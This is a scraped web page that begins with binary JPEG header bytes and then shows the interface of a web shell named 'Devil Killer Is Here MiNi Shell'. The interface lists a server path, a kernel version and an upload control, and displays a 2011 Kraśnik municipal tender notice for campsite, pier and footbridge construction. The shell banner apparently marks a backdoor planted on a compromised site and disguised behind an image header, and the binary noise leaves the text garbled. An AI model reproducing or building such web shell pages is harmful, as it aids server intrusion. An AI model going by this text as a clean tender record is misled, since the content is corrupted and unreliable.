JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110121/25755-N-2011.html

<p class="kh_header"><b>Kraśnik: Rozbudowa infrastruktury turystycznej wokół Zalewu Kraśnickiego</b><br>
<b>Numer ogłoszenia: 25755 - 2011; data zamieszczenia: 21.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kraśnika , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 081 8251540, faks 081 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa infrastruktury turystycznej wokół Zalewu Kraśnickiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia jest kontynuowaniem realizacji zadania p.n. :
Rozbudowa infrastruktury turystycznej wokół zalewu Kraśnickiego
które uwzględnia  wykonanie  zadań częściowych w zakresie :

  Część I zamówienia   - p.n. - ZAGOSPODAROWANIE TERENU  REKREACYJNEGO  w której uwzględniono  n.w. zadania :
Zadanie nr 1) Zagospodarowanie terenu campingu 
Zadanie nr 2) Budowa stanicy wędkarskiej - wraz z przyłączami  i zagospodarowaniem  terenu

Część II zamowienia - p.n. - INFRASTRUKTURA NABRZEŻA  w której uwzględniono n.w. zadania :
Zadanie nr 3)   Budowa molo 
Zadanie nr 4)  Budowa ciągu pieszo-rowerowego wraz z kładką na rzece Wyżnicy
Zadanie nr 5)  Slip do wodowania łodzi  i stanowisko do poboru wody na cele  p .poż. 
   
2. Część I -  ZAGOSPODAROWANIE TERENU  REKREACYJNEGO  uwzględnia wykonanie:

zadanie nr 1 p.n.  Zagospodarowanie terenu campingu   - w zakresie  :

1) niwelacja terenu - pow.  ok. 14.515 m 2 . Przed rozpoczęciem zagospodarowania terenu należy wykonać niwelację terenu odszukując przyłącza do planowanych domków campingowych ( nadmiar ziemi rozplanować) oraz zbiornik ścieków sanitarnych z przyłączami do budynku sanitarnego
2) ogrodzenie terenu campingu - panelowe ( szer. 2,5 m wys. 1,73 m ) 
z prętów stalowych ocynkowanych i powleczonych proszkowo poliestrem z bramami wjazdowymi (szer. 5 m  wys. 1,73 m  ) oraz furtkami szer. 1,5 i 1 m 
3) domki campingowe - szt. 5 o pow. zabudowy min  24 m2 ( z poddaszem i tarasem) po 4 miejsca noclegowe w każdym .
4) mała architektura w zakresie : obudowane palenisko, ławy drewniane, parking       rowerowy, plac zabaw , pojemniki na odpady
5) zieleń - trawniki, nasadzenia, pielęgnacja w części zachodniej .

Domki campingowe ( szt. 5 ):
 zlokalizowane na terenie ogrodzonym, będą użytkowane w sezonie letnim ; 
Przyjmuje się , że będą w konstrukcji drewnianej szkieletowej, z elewacją zewnętrzną drewnianą z półbala, malowana impregnatem dekoracyjnym; wewnętrzna warstwa wykończeniowa - drewno, boazeria sosnowa malowana dwukrotnie lakierem bezbarwnym  i  płyty Rigips,;
Wyposażone w instalacje: elektryczna, wod.-kan.. Wydzielona łazienka z wyposażeniem (białym montażem)    i wmontowana lada kuchenna. 
 Podłoga - panel podłogowy na piance; Taras - ażurowy z deski struganej + barierka ; Dach - krokwie, laty, wełna, folia wiatroizolacyjna, blachodachówka . Okna drewniane z szybami zespolonymi i okiennicami . Drzwi drewniane pełne, impregnowane i malowane lakierem bezbarwnym 
Wszystkie elementy drewniane muszą być impregnowane przeciwwilgociowo  i przeciwgrzybiczo. 
  W cenie uwzględnione muszą być wszystkie elementy konstrukcyjne, wykończeniowe,       materiałowe. Wyposażenie:   miejsca do spania po 4 w każdym domku, stolik, 4 krzesła tapicerowane, komoda z drewna sosnowego, szafa ubraniowa dwudrzwiowa, wieszak stojący  
Altana ogrodowa - szt 1 o śr, 2,5 m, drewniana, malowana lakierem bezbarwnym.
Niwelacja terenu - rozplantowanie nawiezionej ziemi i odszukanie przyłączy do domków campingowych;
Mała architektura :
Miejsce na ognisko: obmurowane (kamień) śr. ok. 1,5 m i wys. nad ziemią ok. 0,6 m ., ławy drewniane ( szt. 5 ), ławki z oparciem i bez (szt.5), ławo-stoły ( szt. 10)  pojemniki na odpady - do sortowania ;  parking rowerowy - betonowy, (dla 20 rowerów );
urządzenie placu zabaw - zestaw : zjeżdżalnia ze ślizgiem drewnianym, wieża ze ślizgami,  huśtawka podwójna PB -06 ; kaczka na sprężynie, motocykl na sprężynie; karuzela tarczowa, krzyżowa; huśtawka wagowa dwuosobowa, piaskownica z palisady wyposażona w płaszczyzny zabawowe; przeplotnia 
Sprzęt na placu zabaw dla dzieci musi posiadać certyfikat bezpieczeństwa. oraz spełniać       wymagania norm unijnych: PN-EN 1176-1 (część 1-6) : 2001; PN-EN 1177:2000, PN-EN   1177:2000 - A1:2004,.PN-EN 13198-2005 Elementy małej architektury ulic i ogrodów 
Huśtawki nie mogą mieć poprzecznych prętów podtrzymujących konstrukcję. Siedzenie zawieszone na łańcuchach , których ogniwa nie mogą być zbyt szerokie , aby nie mieściły się  w nich dziecięce palce. 
Piaskownica powinna być drewniana lub gumowa z odpowiednimi atestami. Podłoże na placu zabaw powinno być trawiaste  Konieczne jest ogrodzenie o wysokości 1 m, uniemożliwiające dostęp zwierzętom domowym.
Urządzenia zabawowe powinny być wykonane z materiałów naturalnych (drewno), przyjaznych w codziennej eksploatacji i naturalnie wpisujących się w otaczający miejsce zabaw krajobraz oraz wandaloodporne. Rodzaj nawierzchni , która powinna znaleźć się   w strefie swobodnego upadku ma być powiązana z wysokością na jakiej bawi się dziecko.
Wykonawca wraz z ofertą przedłoży warunki gwarancji i serwisu pogwarancyjnego.
Zieleń - dotyczy strony zachodniej, placu campingowego w zakresie trawników, nasadzeń    i pielęgnacji.     

       
zadanie nr 2 p.n.  Budowa stanicy wędkarskiej - wraz z przyłączami   i zagospodarowaniem terenu
Realizowane zadanie uwzględnia wykonanie robót w zakresie budowy stanicy wędkarskiej tzw.   pod klucz.
Charakterystyka ogólna : 
-  pow. zabudowy - ok. 307,9 m2 ;
-  kubatura ok. 1460 m3 ;
- odporność pożarowa - w klasie D ; 
Budynek parterowy z wiatą i hangarem, przykryty wspólnym dachem, wyposażony   w instalacje: wod.- kan,. wentylację mechaniczną nawiewno-wywiewną , c.o., gazową,  elektryczną i teletechniczną 
Wokół budynku należy wykonać utwardzenie terenu wraz z dojazdem o nawierzchni z kostki brukowej. Budynek do całorocznego użytkowania i przystosowany dla osób niepełnosprawnych.  
Budynek parterowy z uwzględnieniem n.w. elementów  konstrukcyjnych :
Ściany nośne z cegły pełnej klasy 15 MPa, działowe z cegły dziurawki gr. 12 cm ;
Pokrycie dachu - dachówka ceramiczna typ S, konstrukcja dachu z drewna sosnowego klasy C27 zabezpieczona przed działaniem ognia, grzybów domowych i pleśniowych oraz przed działaniem owadów np. ocean 441 B;
Okładziny wewnętrzne: farby akrylowe, lateksowa;
Stolarka i ślusarka ( jasny brąz) : okna PVC max U=1.6 W/m2K, drzwi zewnętrzna -    aluminiowe przeszklone max U=2.3w/m2K; brama do hangaru -stalowa, segmentowa podnoszona ręcznie;
	Rynny i rury spustowe - PVC ( jasny brąz);
	Utwardzenie placu wokół budynku i dojazdu do budynku;
 
 3.  Część II -  INFRASTRUKTURA NABRZEŻA uwzględnia wykonanie: 

zadanie nr 3 p.n.   Budowa molo w zakresie :
 1)   budowa mola o wymiarach: dl. 45 m i szer. 4 m , 6 m , 8 m,; konstrukcja na palach stalowych  
śr. 244,5mm  na głębokości średnio 4 m. Poszycie pomostów z desek ryflowanych  5 x 12 cm, 
z drewnianą balustradą 
2)   umocnienie skarpy ;

zadanie nr 4 p.n.  Budowa ciągu pieszo-rowerowego wraz z kładką na rzece Wyżnicy  w zakresie :
a)   budowa ciągu pieszo-rowerowego;
b)   Inżynieria ruchu : stała i tymczasowa organizacja ruchu ;
c)  Budowa kładki na rzece Wyżnicy - o projektowanym obciążeniu - q = 4,0 kN - m2 - wg PN -85 - S-  10030  

1) Ciąg pieszo-rowerowy o nawierzchni z betonowej kostki brukowej kolorowej  gr.8 cm, szer. 4 m,   na odcinku ok. 219,65 m  wraz z pracami przygotowawczymi o konstrukcji gr 43 cm, w tym : 
- warstwa ścieralna z betonowej kostki brukowej 8 cm ,
- podsypka piaskowa - 5 cm 
- podbudowa z kruszywa stabilizowanego cementem o Rm = 2,5 MPa - 15 cm ;
 - podbudowa z kruszywa łamanego stabilizowanego cementem o Rm = 1,5 MPa - 15 cm  
b)   udrożnienie przepustu ( przepust rurowy fi 80 ) dł. 7 m ;
c)   konserwacja rowu odwadniającego od ul. Urzędowskiej do rzeki;
d)   wycinka drzew ( szt. 4 ) i nasadzenia .
            
 2)    Inżynieria ruchu : stała i tymczasowa organizacja ruchu w zakresie :
a)	oznakowanie poziome - linie segregacyjne ciągłe i symbole z zastosowaniem białe farby odblaskowej, grubowarstwowe ( zgodnie z rozporz. Ministra Infrastruktury z dn. 3.07.2003 w sprawie szczegółowych warunkow technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego  i warunkow  ich umieszczenia na drogach) ;
b)	oznakowanie pionowe - znaki odblaskowe II generacji, średniej wielkości, z       montażem, na słupkach;
c)	urządzenia bezpieczeństwa ruchu - balustrada U -11a ; 

3)  Budowa kładki na rzece Wyżnicy - o projektowanym obciążeniu - q = 4,0 kN - m2 - wg     PN 85 - S-10030  w tym : 
a) wykonanie kładki:   
- szer. pomostu - B = 4,50 m, rozpiętość teoretyczna przęsła Lt= 11,50 m, Lc =15,06 m ;  przyczółki - żelbetowe posadowione na palach żelbetowych  fi 50 cm wykonanych na  mokro;
- wykonanie ustroju niosącego z belek stalowych z płytą żelbetową średniej gr. 15 cm, 
   z nawierzchnią cienkowarstwową z żywic  epoksydowych;
- elementy wyposażenia kładki: balustrady stalowe z płaskowników, umocnienia stożków nasypu;
b) przełożenie - regulacja wysokościowa ciągu pieszo-rowerowego na dł. ok. 46 m, dowiązując się sytuacyjnie do istniejących krawędzi ciągu pieszo-rowerowego po lewej stronie rzeki Wyżnicy; 
c)  humusowanie skarp i umocnienie biowłókniną .


zadanie nr 5) p.n. Slip do wodowania łodzi  i stanowisko do poboru wody na cele                     p.poż. w  zakresie  :
1)	budowa slipu  -  z  prefabrykatów żelbetowych wykonywanych na budowie
2) stanowiska do poboru wody na cele p. poż.  - woda na cele p. poż. będzie pobierana z dwóch stanowisk, za pośrednictwem dwóch studni czerpnych i dwóch szybkozłączek dn 110. Studnie będą betonowe Dn 1000 gł. 3,9 m z włazem żeliwnym fi 600 mm,  typu D 400, z 2 ryglami wg normy PN-EN 124:2002. Plac manewrowy wyłożony kostką;
3) dojazdy : do przystani i stanowiska poboru wody na cele p. poż., 
Droga dojazdowa do przystani rozpoczyna się zjazdem z istniejącego parkingu i zakończona      placem  manewrowym 20 x 39 m . Projektowana  szerokość - 5 m  i dł. 139,96 ,zjazd na pole biwakowe i plac postojowy 22 x 10 m , chodnik jednostronny szer. 2 m.


4. Podstawę wyceny i wykonania przedmiotu zamówienia stanowią:
	projekty budowlane i wykonawcze ;
	specyfikacje techniczne wykonania i odbioru robót;
	plany zagospodarowania terenu;
	niniejsza specyfikacja istotnych warunków zamówienia, zalecenie zamawiającego, wizja w terenie;
które określają   wymagania niezbędne do określenia standardu i jakości wykonania robót, sposobu wykonania robót   budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót, stanowiące załączniki do SIWZ.

5. Wskazane w dokumentacji projektowej, przedmiarach i specyfikacjach technicznych wykonania 
i odbioru robót budowlanych nazwy materiałów, urządzeń lub źródła pochodzenia należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych, że Zamawiający dopuszcza składanie ofert równoważnych. Wymaga to uzgodnienia z autorem dokumentacji projektowej potwierdzającego równoważność oferowanych urządzeń i materiałów w stosunku do wskazanych w projekcie. Uzgodnienie to należy do obowiązków Wykonawcy. O wykorzystaniu, za zgodą autora dokumentacji projektowej, urządzeń i materiałów równoważnych w stosunku do wskazanych w projekcie, Wykonawcy informują Zamawiającego w ofercie, załączając opinię autora dokumentacji projektowej.
6.  Zaleca się, aby Wykonawca dokonał wizji lokalnej w terenie, gdzie będą realizowane roboty będące  przedmiotem zamówienia oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy. 
7. Realizacja powyższego zakresu winna być wykonana w oparciu o obowiązujące przepisy,                             a w   szczególności ustawy z dnia 07 lipca 1994r. Prawo budowlane (tekst jednolity Dz.U. z 2006r., Nr 156,  poz.1118 z późn.zm.) wraz z przepisami wykonawczymi, przez Wykonawcę posiadającego stosowne doświadczenie i potencjał wykonawczy określony              w SIWZ oraz przez osoby posiadające odpowiednie kwalifikacje i doświadczenie. 
 8. Wykonanie i oddanie do użytku musi być również zgodne z wszystkimi aktami prawnymi właściwymi dla przedmiotu zamówienia, z przepisami techniczno - budowlanymi, obowiązującymi polskimi normami, wytycznymi oraz zasadami wiedzy technicznej. 

Wymagany okres gwarancji na wykonane roboty - minimum 3 lata..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt 6 ustawy - Prawo zamówień publicznych, tj. w przypadku udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 34.92.82.00-0, 39.11.33.00-0, 45.11.12.91-4, 34.92.84.80-6, 45.10.00.00-8, 45.23.32.20-7, 45.23.32.60-9, 45.11.27.20-8, 45.11.27.10-5, 45.21.13.20-8, 45.24.13.00-1, 45.24.42.00-1, 45.22.11.00-3, 45.23.30.00-9, 44.21.21.00-0, 44.21.21.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium w wysokości:
Część I  30 000 zł (słownie: trzydzieści tysięcy złotych), 
Część II  40 000 zł (słownie: czterdzieści tysięcy złotych),
Uwaga! W przypadku składania oferty na obie części wadia należy zsumować
które może być wnoszone w:
-	 pieniądzu,
-	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym 
-	 poręczeniach i gwarancjach bankowych,
-	 gwarancjach ubezpieczeniowych,
-	 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. z 2007r. Nr 42, poz. 275 z późn. zm.)
2.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy Ziemi Kraśnickiej w Kraśniku nr 10 8717 0009 2001 0000 0909 0013. 
3.	Jeżeli wadium zostanie wniesione w pieniądzu przelewem, wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. W tytule przelewu należy wpisać: wadium - przetarg na: Rozbudowa infrastruktury turystycznej wokół Zalewu Kraśnickiego Część I / Część II*. (*w zależności na którą część składana jest oferta)
4.	Za wyjątkiem wadium wniesionego w pieniądzu, wymagane jest dołączenie do oferty oryginału dokumentu wystawionego na rzecz Zamawiającego. Dokumenty, 
o których mowa muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
5.	Wadium musi być wniesione przed upływem terminu składania ofert, tj. do 21.02.2011 r. do godz. 11:00 (liczy się data wpływu środków na rachunek bankowy Zamawiającego).
6.	Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą.
7.	Wykonawcy, którzy wnieśli wadium nie stanowiące całości wymaganej kwoty lub, gdy forma jest niezgodna z rozdziałem XII pkt 1 SIWZ - są wykluczeni.
8.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca na wezwanie Zamawiającego nie uzupełni wymaganych dokumentów, oświadczeń lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn niezależnych od niego.
13.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
14.	Wykonawca traci wadium na rzecz zamawiającego, jeżeli:
-	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniesie zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania należy przedłożyć oświadczenie stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia oceniony zostanie na podstawie wykazu robót (załącznik nr 3 do SIWZ) wykonanych w ostatnich pięciu latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Warunek zostanie uznany za spełniony, jeżeli w tych latach wykonawca wykonał dla Części I wykonali co najmniej dwa zadania z zakresu budowy budynków kubaturowych o wartości min. 500.000 zł (brutto) każdy; dla Części II wykonali co najmniej jedno zadanie z zakresu budowli hydrotechnicznych lub obiektów mostowych o wartości min. 500.000 zł (brutto) każde.  
Należy załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy złożyć oświadczenie stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia  - dla Części I dysponują osobami posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej (branża budowlana) oraz  instalacyjnej w zakresie sieci, instalacji i urządzeń centralnego ogrzewania, dla Części II dysponują osobami posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej (branża drogowa) oceniony zostanie na podstawie oświadczenia (zał. nr 4 do SIWZ). W przypadku nie dysponowania takimi osobami, oprócz oświadczenia należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie działalności zgodnej z przedmiotem zamówienia, na kwotę nie mniejszą niż 1 000 000 zł. Warunek dotyczący sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

